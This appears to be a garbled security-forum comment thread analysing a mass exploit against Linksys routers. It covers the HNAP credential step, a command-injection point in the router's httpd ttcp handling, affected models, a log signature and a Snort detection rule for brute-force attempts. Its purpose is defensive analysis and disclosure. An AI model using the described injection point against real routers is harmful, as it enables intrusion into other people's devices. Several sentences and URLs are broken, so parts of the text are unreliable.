I am withholding the full URL for now until I can figure out if there is a patch or if this is a public/known exploit. I hope that password mentioned isn't another case of hard-coded credentials to debug stuff on the router.The port appears to change but is always The binary also includes a couple of images (thanks Peter for pointing that out). The initial HNAP technique is described here: it looks like they snag the credentials in the initial attempt and then post back with those credentials on the second request causing the second stage to be executed. https://edu/forums/diary/Suspected Mass Exploit Against Linksys E1000 E1200 Routers/17621/1#29684 I believe the second stage is using a technique described in a blog post by one of my co-workers back in March of 2013... Short summary: - all useragents match your list - oldest hit was in August 2013 (previous hits in July didn't use the "admin" password) - Linksys models involved in the scanning include not only E1000 and E1200, but also E1500, E2500, E3200 and E4200 (full list with firmware versions Cmd line injection vulnerability seems to go back a long ways.
epi_ttcp is being called by the usr/sbin/httpd without checking/validating the parameters being passed.
"epi_ttcp -tsufm -l %s -n %s %s &", ttcp_size, ttcp_num, ttcp_ip So its a similar issue as what was disclosed in May 2013, but instead of exploiting a problem with the ping test part of the code its in the ttcp section in Start_epi function inside httpd.
I believe it's only for fingerprinting the model number.
@Anonymous From what I've seen, it's using the username "admin" and randomly generated password, not password "admin".
It shows up in the logs as the "\x80w\x01\x03\x01" string in apache web logs. $HOME_NET $HTTP_PORTS (msg:"SERVER-WEBAPP HNAP admin brute force login attempt"; flow:established,to_server; content:"GET|20 2f|HNAP1|2f 20|HTTP|2f|1.1|0d 0a|"; fast_pattern:only; content:"Authorization|3a 20|Basic YWRta W46"; http_header;metadata:policy balanced-ips drop, policy security-ips drop, ruleset community, service http;reference:url, classtype:bad-unknown; sid:10000112; rev:2;)@claudijd Not the same thing; the password is included in the initial HNAP request and it seems to be randomly generated with each request (i.e.